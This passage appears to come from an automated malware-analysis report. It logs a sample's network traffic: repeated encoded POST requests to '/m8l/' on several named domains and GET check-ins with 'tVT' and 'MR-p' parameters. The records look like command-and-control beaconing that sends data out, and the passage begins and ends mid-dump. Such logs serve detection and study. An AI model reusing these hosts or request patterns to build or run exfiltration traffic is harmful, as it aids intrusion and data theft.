39 31 43 4f 6e 45 50 58 78 4d 69 4c 37 58 43 78 4d 4f 7e 67 6a 47 58 7a 66 56 4f 34 7e 38 69 2d 47 69 41 5a 34 2d 56 6e 7a 2d 4a 4f 5a 44 4c 67 4d 54 75 6b 67 6d 46 54 7a 74 30 61 6b 71 36 38 48 54 77 51 44 6e 31 45 66 7a 52 42 71 70 7a 5f 7e 50 55 4a 4d 4b 61 6d 34 4b 42 30 4c 6d 44 30 65 4c 69 70 35 74 50 49 33 51 66 6b 54 5f 47 49 6a 41 7a 50 45 56 6b 4e 63 36 44 46 69 44 4c 59 77 41 62 50 51 75 47 4a 56 4c 39 49 57 66 37 4a 59 30 48 30 4b 74 4a 32 44 30 30 79 4b 50 76 47 58 50 49 39 6f 73 69 38 4e 48 6c 32 74 7a 78 49 78 39 65 73 43 50 33 77 66 2d 6a 4b 7a 65 71 71 66 6c 67 30 33 57 42 33 37 62 47 51 69 38 4b 49 4a 30 6a 41 4a 47 78 69 39 71 45 59 71 59 59 33 4b 4c 54 78 57 59 4e 6f 47 78 39 58 69 51 54 36 61 49 59 72 47 2d 4c 71 50 73 37 6b 53 38 6f 70 4e 36 6e 6b 44 63 64 36 51 5a 5a 73 36 4b 4f 73 6b 35 54 33 7a 4c 4f 4f 34 7a 4b 43 65 4d 6c 73 31 58 39 30 7a 36 28 68 4a 70 76 36 50 43 4c 6e 6f 78 6c 66 33 79 68 5f 52 45 59 5f 6b 64 43 47 44 4d 64 57 6d 6e 44 4a 52 77 4c 6b 57 58 61 34 4c 4e 74 5f 28 72 69 44 71 36 70 68 61 44 42 32 68 53 79 46 4e 70 4d 52 38 41 41 58 70 5f 64 6a 58 55 6a 63 55 37 57 67 55 41 29 2e 00 4b 30 67 29 2e 00 00 Data Ascii: tVT=H7o9kAcL7twk0j0zadQ9(3BG91COnEPXxMiL7XCxMO~gjGXzfVO4~8i-GiAZ4-Vnz-JOZDLgMTukgmFTzt0akq68HTwQDn1EfzRBqpz_~PUJMKam4KB0LmD0eLip5tPI3QfkT_GIjAzPEVkNc6DFiDLYwAbPQuGJVL9IWf7JY0H0KtJ2D00yKPvGXPI9osi8NHl2tzxIx9esCP3wf-jKzeqqflg03WB37bGQi8KIJ0jAJGxi9qEYqYY3KLTxWYNoGx9XiQT6aIYrG-LqPs7kS8opN6nkDcd6QZZs6KOsk5T3zLOO4zKCeMls1X90z6(hJpv6PCLnoxlf3yh_REY_kdCGDMdWmnDJRwLkWXa4LNt_(riDq6phaDB2hSyFNpMR8AAXp_djXUjcU7WgUA).K0g). Source: global traffic HTTP traffic detected: POST /m8l/ HTTP/1.1Host: www.teccommunications.comConnection: closeContent-Length: 142745Cache-Control: no-cacheOrigin: http://www.teccommunications.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.teccommunications.com/m8l/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 74 56 54 3d 48 37 6f 39 6b 44 4d 6c 38 64 6c 69 78 52 63 6b 66 76 38 63 79 47 35 49 28 46 57 43 35 6a 43 6d 34 38 4f 62 37 57 79 31 45 76 76 5f 6d 6d 48 7a 50 67 53 37 6c 73 69 5f 52 79 41 57 70 4f 5a 66 74 65 68 47 5a 43 66 4f 4d 54 6d 6e 31 55 64 53 7a 39 30 4a 6c 4b 6d 51 54 6a 6c 43 44 69 74 74 66 52 39 53 74 70 76 5f 36 5f 4d 4c 41 4c 4b 4c 75 66 74 78 52 79 62 37 59 4b 61 77 35 65 4c 77 33 79 69 42 44 75 71 4b 6b 7a 75 4e 50 30 56 61 4b 4c 4c 30 73 7a 66 56 31 48 4b 53 50 5a 66 4f 59 71 38 72 4b 4d 6a 4b 47 33 33 75 42 4e 35 2d 54 56 42 49 4e 4f 28 53 58 4d 35 49 7a 4f 33 36 4a 41 6c 2d 7e 79 39 79 37 70 4f 75 4f 65 32 31 4f 6f 33 34 31 64 79 56 44 52 77 52 39 6d 74 59 34 59 28 58 6d 74 53 7a 46 68 50 4d 64 44 4e 57 7e 35 6f 75 31 49 70 6e 44 6f 7a 69 59 70 74 67 48 43 52 6c 28 67 53 53 63 49 59 5f 4f 63 69 64 65 34 66 72 54 76 68 6c 61 4e 37 4c 56 59 70 37 58 61 73 2d 6e 59 79 76 6f 6f 4c 72 37 5a 57 36 76 6c 71 33 59 72 4d 53 39 33 39 72 35 63 72 63 4a 70 75 44 50 43 6e 65 70 46 74 66 33 6a 42 6f 53 6c 59 37 31 4e 43 68 50 5f 6c 75 38 41 44 5a 52 77 54 6b 51 6c 44 74 49 63 70 5f 31 64 6d 45 71 59 42 68 61 7a 42 32 71 79 7a 30 4e 6f 52 61 37 57 4d 6c 6e 65 4d 6c 44 7a 47 4b 52 49 54 4c 45 36 6a 35 67 37 72 5a 4e 5a 64 6b 76 5a 32 41 4d 30 4e 4a 31 71 68 77 54 33 73 66 73 73 49 68 77 44 39 33 48 4c 49 47 73 6d 6e 57 47 6c 6e 4e 77 6c 32 4d 4c 4c 57 77 33 57 4b 70 36 64 43 63 66 4c 55 46 6b 74 77 33 63 6b 79 62 68 51 73 6c 35 53 41 75 72 7a 46 37 37 59 39 6a 7e 55 46 72 6e 5f 50 31 55 6f 62 58 31 41 72 34 7a 62 52 4d 38 67 64 30 48 55 72 65 74 69 71 6e 39 50 75 55 76 74 70 77 32 65 4f 4f 38 43 66 69 52 33 49 5f 31 4e 47 77 34 4a 71 65 68 6e 65 51 51 6d 6c 64 50 4a 30 45 6a 69 77 4c 79 33 65 4d 50 53 39 4a 6c 76 77 70 53 6e 4e 50 55 56 4b 35 61 49 54 61 72 65 45 6b 79 4e 74 6a 59 48 64 56 41 44 44 56 73 59 43 39 7e 41 69 37 4a 6d 30 73 36 54 68 33 77 51 64 39 62 56 35 48 45 54 31 58 68 2d 76 4d 49 52 76 57 37 67 54 37 33 63 6b 45 6c 7a 59 6e 63 75 31 47 78 35 79 35 44 77 49 62 4e 58 65 57 53 69 63 4e 52 67 68 36 4f 51 6b 74 32 65 34 49 28 43 77 67 59 79 33 53 58 74 47 47 6d 2d 48 74 69 73 67 59 32 62 62 42 35 30 77 46 41 58 76 47 69 54 6d 70 38 50 74 62 46 30 69 4e 61 39 36 68 39 67 43 6b 6c 6e 47 79 76 61 49 48 46 62 62 69 49 36 69 72 36 6a 59 44 4e 46 4b 63 48 38 56 5f 36 74 70 33 62 42 50 58 77 42 4d 63 48 50 47 77 6b 65 6e 62 79 49 62 6d 4e 4c 66 56 72 4e 7a 55 64 53 39 57 55 39 37 36 4d 48 47 7a 72 71 64 7a 56 6b 53 7a 4c 72 58 51 50 6b 33 6c 58 50 53 78 45 73 35 4a 55 49 49 61 70 42 75 54 58 42 30 77 79 4c 70 30 76 6 Source: global traffic HTTP traffic detected: POST /m8l/ HTTP/1.1Host: www.obsoletelabs.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.obsoletelabs.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.obsoletelabs.com/m8l/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 74 56 54 3d 50 67 68 45 47 48 42 31 31 49 59 4e 64 41 66 38 37 74 77 6c 57 59 4b 74 52 66 4e 49 69 4f 45 46 63 51 47 70 71 72 73 6b 45 45 32 55 6e 35 51 71 6b 66 7a 41 74 4a 51 41 74 38 48 4b 4f 50 48 77 35 56 39 55 72 6b 28 49 65 75 6d 55 79 79 5a 34 6c 62 6e 54 34 48 37 42 72 7a 63 4e 53 6f 36 66 70 4a 51 59 63 34 52 57 6e 74 43 49 32 68 4e 33 6c 79 68 68 55 74 6c 5f 44 32 75 4b 51 5f 48 38 51 62 4d 4f 34 59 53 76 50 33 4d 37 4b 37 49 30 44 77 41 36 38 6a 4d 35 51 4f 49 75 65 6e 72 50 4f 65 47 79 52 4a 59 57 4c 71 38 74 37 6e 43 46 72 75 67 44 7e 76 6c 58 34 52 42 4b 70 38 57 67 36 5f 31 39 32 30 75 41 44 50 69 5f 77 79 46 69 71 64 58 7a 43 5f 37 67 62 68 34 66 36 63 69 36 36 6b 37 76 49 69 34 50 43 76 35 68 61 51 55 43 51 53 58 6b 31 42 32 39 5a 67 41 47 4a 6c 74 59 7e 36 57 61 79 37 52 70 51 4f 48 30 6c 43 70 61 66 76 77 52 73 76 6c 75 31 67 74 54 53 35 66 50 45 30 30 41 6e 2d 6f 47 4b 46 4e 30 58 34 37 78 46 34 53 71 78 54 33 34 31 4f 76 34 56 45 56 34 75 57 6d 31 32 4e 52 6d 42 62 73 46 4b 72 65 79 4c 58 54 49 70 5f 76 51 36 66 33 73 6a 68 69 66 61 55 67 51 76 72 32 56 47 30 7a 6b 65 6f 66 32 33 72 44 6a 44 6a 4a 54 58 4b 55 61 73 4c 59 49 48 70 4e 46 77 50 73 75 6e 62 6a 48 57 35 47 30 55 51 29 2e 00 64 6a 58 55 6a 63 55 Data Ascii: tVT=PghEGHB11IYNdAf87twlWYKtRfNIiOEFcQGpqrskEE2Un5QqkfzAtJQAt8HKOPHw5V9Urk(IeumUyyZ4lbnT4H7BrzcNSo6fpJQYc4RWntCI2hN3lyhhUtl_D2uKQ_H8QbMO4YSvP3M7K7I0DwA68jM5QOIuenrPOeGyRJYWLq8t7nCFrugD~vlX4RBKp8Wg6_1920uADPi_wyFiqdXzC_7gbh4f6ci66k7vIi4PCv5haQUCQSXk1B29ZgAGJltY~6Way7RpQOH0lCpafvwRsvlu1gtTS5fPE00An-oGKFN0X47xF4SqxT341Ov4VEV4uWm12NRmBbsFKreyLXTIp_vQ6f3sjhifaUgQvr2VG0zkeof23rDjDjJTXKUasLYIHpNFwPsunbjHW5G0UQ).djXUjcU Source: global traffic HTTP traffic detected: POST /m8l/ HTTP/1.1Host: www.obsoletelabs.comConnection: closeContent-Length: 142745Cache-Control: no-cacheOrigin: http://www.obsoletelabs.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.obsoletelabs.com/m8l/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 74 56 54 3d 50 67 68 45 47 47 34 45 79 34 55 6d 61 79 33 72 73 71 51 49 4a 6f 69 76 58 76 42 55 7e 74 35 30 43 33 58 73 71 72 63 67 4d 68 72 62 73 35 67 71 69 64 4c 48 35 5a 51 44 38 73 48 56 4b 50 62 49 6a 47 74 4d 72 6c 36 66 65 75 75 62 38 52 42 48 6c 4c 6e 49 34 6e 33 58 36 44 49 61 53 71 7e 32 71 72 38 51 4f 6f 74 57 6a 5a 75 47 72 31 51 70 31 57 4a 2d 64 39 35 2d 42 31 69 44 51 49 28 74 52 34 77 57 28 63 7a 4a 4c 45 51 77 55 72 34 63 48 6e 38 6c 79 54 6f 36 63 76 64 30 52 67 7a 4c 4e 61 54 50 50 62 77 56 49 61 30 6e 33 46 61 33 75 63 4d 32 38 2d 55 75 34 53 78 77 76 4b 33 6d 7e 2d 70 31 30 47 4c 6c 4e 64 4f 35 38 6c 5a 36 75 66 50 67 4f 66 4c 50 45 30 63 45 77 74 7e 76 32 48 43 69 46 67 49 61 52 75 31 39 52 43 64 31 52 77 36 70 39 67 6d 43 42 54 67 56 42 57 31 41 28 5f 48 4c 38 37 51 39 41 2d 48 67 74 67 68 69 62 4a 49 67 70 75 56 41 78 6a 39 43 59 49 7a 4d 4b 52 30 45 6a 76 73 46 49 77 68 77 45 4f 33 6a 57 72 66 6e 67 7a 44 78 68 65 76 6a 41 52 35 76 75 57 6d 58 32 4f 4a 41 54 36 6f 46 4c 37 7e 74 49 30 37 55 34 76 76 4a 32 72 54 69 74 79 4c 61 61 55 34 51 68 36 47 76 42 58 6a 6b 5a 2d 62 31 33 4a 37 6a 42 54 4a 54 44 36 56 57 39 71 38 41 42 34 31 79 77 76 5a 31 7a 76 33 54 57 34 44 57 43 63 52 44 4f 65 50 75 33 63 4d 6f 4c 6c 66 36 36 79 57 43 53 39 7a 67 4e 4c 4d 30 48 32 52 56 31 4c 6e 37 32 73 34 69 4f 74 62 68 42 5f 72 57 34 6c 42 42 52 72 48 43 56 6e 4a 74 42 54 6a 58 7a 47 39 75 54 52 7a 67 6f 6a 64 4d 6c 42 72 2d 42 36 54 6a 5a 6d 44 77 52 39 44 78 4f 4a 53 75 53 51 72 78 38 5f 36 68 70 6f 61 66 4f 75 38 57 43 70 34 33 74 77 6b 45 34 6d 39 56 70 71 37 6f 52 78 6d 64 32 4f 6a 4c 74 6a 49 53 38 5a 28 37 56 41 30 38 32 4d 51 61 59 4f 56 39 54 38 4f 6b 77 52 65 2d 35 35 36 38 30 35 56 77 53 30 55 38 63 6b 37 7a 30 45 38 6a 78 53 67 4c 58 41 35 31 57 32 43 63 74 75 7a 6d 62 73 78 73 39 65 79 66 70 38 65 61 52 52 52 6f 51 6f 76 79 75 45 61 6d 72 79 79 4f 77 57 65 2d 69 35 78 35 4c 5f 65 69 58 6f 69 69 6b 62 66 55 68 2d 42 4a 37 34 41 6e 68 4b 4b 61 6b 4d 6e 69 44 66 4e 70 77 73 7a 4c 69 34 77 67 30 38 30 39 44 65 78 35 6a 43 65 67 32 68 4e 68 53 72 32 45 73 45 70 50 79 67 28 59 4d 2d 79 78 6c 33 28 5a 69 2d 66 5a 5a 35 36 38 6f 4e 54 73 71 65 37 4a 73 69 54 61 78 76 4a 59 39 75 53 32 33 32 57 59 71 75 69 31 61 6d 7a 47 58 5f 66 66 58 76 38 73 4f 4b 43 48 68 4b 4e 50 33 66 46 35 37 65 34 71 6f 4a 34 62 7a 34 38 58 30 33 56 70 67 4c 41 61 72 4a 44 42 54 5f 49 6c 66 4e 7e 50 62 41 64 32 48 38 53 54 47 77 53 30 7e 48 41 75 69 59 32 5f 4f 46 58 4a 67 61 39 76 75 72 50 4e 47 48 67 43 4a 6e 49 6e 53 42 38 34 6a 49 72 76 74 70 46 4b 41 6e 7 Source: global traffic HTTP traffic detected: POST /m8l/ HTTP/1.1Host: www.artiyonq.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.artiyonq.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.artiyonq.com/m8l/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 74 56 54 3d 78 30 7a 44 36 67 70 4d 76 52 56 6c 6e 31 28 65 31 35 4f 49 42 57 7a 4f 6b 79 61 33 47 4c 6e 41 5a 6c 6a 32 6d 6f 55 2d 4f 32 4a 42 41 33 59 76 55 4c 48 68 62 44 44 67 61 36 6e 4f 65 5f 64 6b 4f 71 61 39 32 39 59 54 48 76 62 6b 71 6f 58 79 42 62 43 68 64 46 34 43 71 4e 7e 6b 78 58 49 48 7e 78 57 73 75 39 79 49 72 78 4c 4e 57 67 68 65 65 6c 68 76 72 7a 45 54 6c 58 74 34 73 2d 36 4a 51 50 52 4b 49 43 75 32 79 67 42 6d 4c 5f 44 31 50 50 54 6d 4c 78 6b 79 6f 75 6b 50 50 65 65 49 36 6e 4b 79 64 4d 34 4b 69 56 34 73 44 66 6e 57 4d 57 30 36 42 72 62 72 7e 71 57 2d 47 56 6e 4c 78 6a 69 67 4b 68 4d 37 6f 57 68 4f 7a 6d 41 42 6e 6c 6e 72 58 45 63 34 67 65 4c 46 68 37 4f 4f 55 41 76 6f 38 65 69 6b 66 66 63 72 50 79 76 69 41 41 42 4f 30 45 34 73 4a 6e 66 65 54 36 72 36 5a 41 5a 36 69 44 49 79 44 54 64 53 6d 71 39 4d 70 72 6d 37 39 49 6d 61 44 66 4a 54 4a 46 4b 59 63 71 4c 56 72 33 54 70 73 54 45 2d 74 59 38 43 32 68 55 39 76 4e 44 36 6b 4e 42 6d 77 4f 52 6c 6c 79 7e 74 79 35 74 77 58 55 76 44 4b 6b 57 6d 39 59 44 6b 72 44 52 32 4c 72 6c 30 41 69 6b 36 39 4a 50 31 34 65 4a 32 75 63 6f 45 6f 4f 68 6f 4a 30 66 41 62 71 76 37 30 36 5a 5f 77 54 4f 36 76 70 73 36 6d 6b 63 6c 4b 70 71 74 51 4e 69 5a 75 77 29 2e 00 62 6a 48 57 35 47 30 Data Ascii: tVT=x0zD6gpMvRVln1(e15OIBWzOkya3GLnAZlj2moU-O2JBA3YvULHhbDDga6nOe_dkOqa929YTHvbkqoXyBbChdF4CqN~kxXIH~xWsu9yIrxLNWgheelhvrzETlXt4s-6JQPRKICu2ygBmL_D1PPTmLxkyoukPPeeI6nKydM4KiV4sDfnWMW06Brbr~qW-GVnLxjigKhM7oWhOzmABnlnrXEc4geLFh7OOUAvo8eikffcrPyviAABO0E4sJnfeT6r6ZAZ6iDIyDTdSmq9Mprm79ImaDfJTJFKYcqLVr3TpsTE-tY8C2hU9vND6kNBmwORlly~ty5twXUvDKkWm9YDkrDR2Lrl0Aik69JP14eJ2ucoEoOhoJ0fAbqv706Z_wTO6vps6mkclKpqtQNiZuw).bjHW5G0 Source: global traffic HTTP traffic detected: POST /m8l/ HTTP/1.1Host: www.artiyonq.comConnection: closeContent-Length: 142745Cache-Control: no-cacheOrigin: http://www.artiyonq.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.artiyonq.com/m8l/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 74 56 54 3d 78 30 7a 44 36 6b 31 79 70 77 45 35 6a 41 54 57 6b 36 69 70 4d 6d 72 4d 69 53 65 7a 50 38 4c 36 51 56 4f 70 6d 70 45 36 45 6b 78 70 4b 33 45 76 53 4a 28 69 57 44 44 68 63 36 6e 4e 61 5f 5a 63 48 59 71 31 32 38 64 49 48 76 44 72 6a 4f 72 33 47 4c 43 4d 62 6b 46 78 6a 70 57 5f 78 53 49 59 7e 55 48 5f 6c 74 7e 49 6d 68 54 50 54 42 77 4d 5a 68 78 77 6d 69 6f 61 32 47 55 38 72 49 7a 30 52 70 5a 6f 5a 47 6d 34 33 57 41 6f 4f 38 72 64 59 6f 33 35 42 42 77 35 32 35 73 51 53 74 37 44 37 69 7e 51 42 35 4d 4e 7e 31 78 38 49 34 61 6c 4b 69 73 74 48 34 44 56 7e 73 57 49 63 54 50 67 31 68 47 6f 47 77 78 75 6a 48 31 4d 28 30 6f 4a 77 51 54 61 52 46 4e 69 38 75 37 56 32 62 54 55 59 6d 71 31 68 72 43 66 64 4b 73 64 48 69 66 57 4e 33 5a 57 39 6e 67 54 4f 67 69 63 64 4c 4c 69 61 43 31 4d 28 7a 4a 55 46 54 64 6b 74 49 30 73 34 35 4b 77 7a 35 57 34 48 59 74 4b 4f 52 28 71 66 6f 28 5a 6c 7a 7a 71 71 6a 73 69 34 5f 77 2d 38 69 34 79 28 66 66 5a 73 74 42 31 72 38 35 73 6c 79 7e 4c 79 34 74 65 57 6b 4c 44 4c 77 43 50 39 37 37 77 28 7a 52 5f 4a 62 31 79 5a 69 6f 55 39 4e 72 31 35 73 52 63 76 76 49 45 69 5f 78 72 4a 57 6e 41 64 61 76 37 39 61 59 39 31 7a 37 72 74 4f 38 67 74 46 4e 79 44 73 57 2d 52 64 44 7a 7e 77 64 61 43 5f 7e 79 37 43 4e 51 59 41 53 56 4b 50 7e 4f 32 48 48 6b 51 67 65 61 6c 2d 32 61 72 70 35 75 44 39 35 4a 39 52 53 70 68 56 4f 4a 54 52 4a 52 66 43 64 58 39 66 32 78 5a 35 45 6a 32 65 43 74 59 41 6d 39 50 67 48 4a 4c 71 46 54 39 4e 6e 38 55 4a 6c 67 6a 37 67 68 7e 34 67 52 75 75 42 45 46 6b 33 63 6e 66 51 34 38 31 35 56 49 78 54 44 37 4f 55 52 46 6a 65 46 7a 5a 72 6b 7a 42 75 5f 38 44 42 42 71 61 55 58 38 42 49 70 51 73 73 58 51 62 51 6b 49 31 59 69 37 43 57 42 67 77 7e 72 44 72 62 5f 35 62 58 5f 38 56 52 51 4e 38 42 64 28 58 4f 66 43 46 61 61 35 66 58 77 4e 4a 37 65 6a 65 45 47 78 46 36 76 74 74 68 59 48 39 7a 59 28 73 61 68 59 41 73 78 4d 36 6b 33 4b 70 69 44 6c 71 4b 46 71 4f 72 55 77 4a 31 62 7e 6c 62 4d 69 67 74 6f 6b 33 55 50 34 34 45 70 33 6f 69 47 57 78 55 45 7e 69 30 44 54 58 53 31 30 65 51 43 42 5f 75 57 55 45 48 6f 36 5f 77 7a 63 77 77 6e 56 51 73 68 55 38 37 6d 61 41 72 5a 5a 47 54 66 73 4e 6a 70 4f 77 72 7a 42 6e 69 72 51 69 7e 6a 64 79 4a 79 53 6f 33 36 37 47 70 63 49 6d 72 31 56 50 38 72 75 48 30 32 76 6c 30 67 6f 62 47 42 62 34 64 4e 31 48 51 74 43 4a 76 70 54 58 61 61 68 79 36 50 78 64 68 33 77 6c 78 71 61 41 50 77 75 65 37 7a 72 4f 75 47 28 57 69 4f 6b 44 58 6d 56 2d 6a 36 41 4d 63 6c 33 6e 31 33 30 76 63 58 47 6d 6e 67 71 67 62 42 64 6e 54 70 77 65 6e 6e 42 50 70 50 6e 63 57 51 51 37 56 42 46 56 47 4e 32 75 4d 35 7a 52 75 66 55 6c 6 Source: global traffic HTTP traffic detected: POST /m8l/ HTTP/1.1Host: www.tgers.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.tgers.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.tgers.com/m8l/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 74 56 54 3d 56 2d 4c 41 30 59 58 57 43 57 4f 46 62 6a 52 64 7e 74 30 39 57 4b 4f 45 51 33 69 58 64 74 6c 33 54 78 4c 35 54 5f 68 62 30 4b 4d 6a 50 74 35 59 50 6d 66 51 7a 59 4f 50 6a 58 39 6b 36 32 63 7a 44 42 41 6e 61 58 75 5f 41 6a 66 55 67 7a 42 5a 52 73 47 71 30 52 6f 30 63 47 4f 4c 4e 64 45 41 6f 74 33 34 61 33 49 2d 49 54 50 52 4f 74 4b 4a 6d 39 6b 30 6a 66 32 38 4d 71 51 51 70 54 50 74 79 50 7a 75 36 4f 6d 7a 6b 6c 6c 50 75 37 4a 38 54 6b 33 76 56 37 70 37 62 70 68 4c 67 48 68 65 51 4f 45 42 7a 54 38 67 57 4d 67 76 4e 41 72 57 28 72 31 34 47 37 42 52 54 57 6a 52 5a 69 47 51 6b 39 6e 48 45 59 7a 59 6a 64 66 56 42 43 7a 73 6a 61 72 33 66 74 65 30 6e 59 61 47 6c 65 4e 65 62 4c 55 38 79 58 69 39 77 43 38 76 73 67 69 51 78 66 5a 41 4a 48 61 66 45 36 52 2d 50 52 53 72 6f 48 4a 41 47 39 75 52 39 4e 5a 55 75 44 33 53 34 33 54 68 37 55 58 5a 74 56 34 6e 42 49 72 79 35 32 46 49 55 62 7e 38 46 73 4f 55 64 59 57 78 7a 2d 53 30 4a 34 73 49 6a 66 50 61 47 72 41 74 4a 47 62 58 73 79 4e 6d 65 53 73 45 74 38 68 5f 34 4b 4d 4f 34 61 78 63 54 33 45 36 43 74 6d 32 32 35 32 32 71 78 7a 38 71 44 58 76 50 45 69 39 4a 6a 30 79 6d 52 79 61 42 38 6e 70 78 31 33 73 50 54 39 6d 38 35 4f 53 76 75 48 77 62 69 6e 6e 65 77 29 2e 00 51 4e 69 5a 75 77 29 Data Ascii: tVT=V-LA0YXWCWOFbjRd~t09WKOEQ3iXdtl3TxL5T_hb0KMjPt5YPmfQzYOPjX9k62czDBAnaXu_AjfUgzBZRsGq0Ro0cGOLNdEAot34a3I-ITPROtKJm9k0jf28MqQQpTPtyPzu6OmzkllPu7J8Tk3vV7p7bphLgHheQOEBzT8gWMgvNArW(r14G7BRTWjRZiGQk9nHEYzYjdfVBCzsjar3fte0nYaGleNebLU8yXi9wC8vsgiQxfZAJHafE6R-PRSroHJAG9uR9NZUuD3S43Th7UXZtV4nBIry52FIUb~8FsOUdYWxz-S0J4sIjfPaGrAtJGbXsyNmeSsEt8h_4KMO4axcT3E6Ctm22522qxz8qDXvPEi9Jj0ymRyaB8npx13sPT9m85OSvuHwbinnew).QNiZuw) Source: global traffic HTTP traffic detected: POST /m8l/ HTTP/1.1Host: www.tgers.comConnection: closeContent-Length: 142745Cache-Control: no-cacheOrigin: http://www.tgers.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.tgers.com/m8l/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 74 56 54 3d 56 2d 4c 41 30 62 48 61 44 6e 66 64 66 51 34 71 32 2d 5a 76 66 36 47 4b 53 47 57 51 44 4e 64 4a 65 47 61 6b 54 5f 52 66 68 5f 51 58 63 65 78 59 4a 6b 33 58 37 59 4f 49 6c 58 39 6c 7e 32 41 4c 4d 41 6b 76 61 56 43 52 41 6c 48 4c 79 77 70 57 52 38 47 39 30 77 55 45 61 43 6d 51 4e 62 4e 51 72 50 62 65 66 33 30 2d 47 48 62 54 42 70 50 56 6a 5f 41 72 74 50 36 35 4b 75 55 4a 70 68 37 5f 77 76 71 42 72 4c 47 78 31 44 4e 59 69 62 34 72 58 33 58 6b 4c 37 74 32 43 61 63 50 71 41 51 58 44 36 51 6e 71 78 55 6e 55 38 35 73 49 43 7a 6b 76 4a 5a 42 56 36 52 46 54 56 54 72 55 78 43 37 31 73 37 66 47 70 76 2d 6f 49 28 58 66 46 76 4f 6f 35 4f 46 5a 74 4f 62 36 6f 71 6a 32 65 68 48 61 4a 38 57 38 57 36 57 79 33 55 64 6e 77 54 77 77 35 55 44 4c 48 71 67 63 74 46 74 46 6c 75 6a 72 42 52 36 43 64 75 71 37 4e 5a 69 36 32 37 44 39 54 33 55 34 45 6d 34 6e 30 78 7a 4e 38 62 39 38 30 42 36 65 61 71 35 47 64 6d 49 56 4c 75 6a 35 5f 47 5f 49 62 78 6a 36 76 4f 62 4d 4e 39 41 4a 47 62 31 73 33 31 59 65 6a 34 45 73 6f 30 6b 34 6f 6b 38 76 4b 78 42 51 6d 30 34 4a 2d 43 6d 32 35 4f 32 72 45 50 47 72 77 48 76 59 42 75 2d 4a 43 30 79 6e 42 79 61 49 63 6d 78 32 31 75 54 4e 57 70 5f 34 62 72 48 73 72 36 58 4e 47 79 62 47 6e 4a 55 7e 76 32 35 47 59 4b 72 59 51 71 57 58 5f 36 4d 72 7a 41 4a 28 4b 6e 41 54 69 65 76 67 5f 6c 4c 42 63 4f 58 47 31 4d 43 62 39 42 58 61 67 47 55 48 35 35 79 61 4a 6f 34 38 6b 34 71 38 70 6d 67 43 58 28 73 46 57 63 5f 34 71 61 32 38 71 53 37 62 2d 6c 35 28 57 41 68 72 66 4d 2d 4b 65 67 4c 74 64 6d 70 76 74 56 4d 43 46 7e 75 68 78 6b 5f 6a 68 50 71 34 69 75 51 62 4a 66 36 7e 49 31 64 70 6c 61 67 6d 56 52 53 46 39 59 59 6c 39 31 78 61 43 52 62 76 70 53 61 7a 72 74 30 37 5a 66 54 50 42 32 62 72 70 46 6f 39 6e 54 56 54 33 72 6f 6e 45 63 38 44 76 36 41 7e 73 78 4b 55 76 79 43 61 77 6f 34 4c 42 63 73 6b 6b 6a 37 68 58 71 31 57 33 4c 6c 72 49 6e 35 71 58 71 51 50 69 79 4f 73 52 64 2d 48 67 54 6c 37 5a 75 41 54 48 5a 31 52 61 68 6c 52 77 4b 41 59 72 68 76 7e 66 6e 49 37 64 79 48 79 37 4f 50 34 50 4f 67 30 43 38 43 56 37 65 6e 5a 6b 6a 30 39 37 33 63 6a 41 44 77 49 79 35 45 4c 6c 61 39 28 47 76 6c 30 4e 32 6f 72 43 7e 52 59 7a 4e 69 47 6c 72 33 38 43 54 47 78 6d 78 53 32 2d 76 64 64 51 78 48 73 7a 79 53 7a 72 51 6b 55 4a 7a 36 58 44 35 67 7a 4e 45 6e 4f 2d 44 4b 62 4e 68 66 30 70 58 57 75 4e 51 6f 49 38 70 33 59 76 67 65 76 74 78 79 38 68 76 57 36 74 65 6d 4a 52 67 54 47 43 51 68 6b 4e 48 4f 70 6d 4e 45 49 61 73 58 66 4f 68 77 7a 63 4a 6e 68 67 54 32 6a 73 6a 35 5a 5a 6c 39 61 48 31 5a 74 47 6d 36 61 31 46 58 35 4f 6f 61 71 30 31 6f 33 2d 35 76 71 48 76 6f 35 72 69 65 64 5
 Source: global traffic HTTP traffic detected: GET /m8l/?tVT=stAPCawU9FsBsDeLDlqawFgIxU41y6VpxlOSmtpgZq2QqlgInUNCOlYAlNLBb+BUECvq&MR-p=0tPLH85x-lH HTTP/1.1Host: www.kmwhbl.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /m8l/?tVT=lki1ed3GPMN5Nw1jaHFlS3B9RQB9zvXEK7YHw36ZfVLkkOoQWGs0VMlLDODNdBIBI6zD&MR-p=0tPLH85x-lH HTTP/1.1Host: www.addis.techConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /m8l/?MR-p=0tPLH85x-lH&tVT=ovbFtOa4uTjd1a92oYI1beIGZw7s4qusWsZU0rgv2nLP+ugoFD+dLAFKen/jDfcukVqZ HTTP/1.1Host: 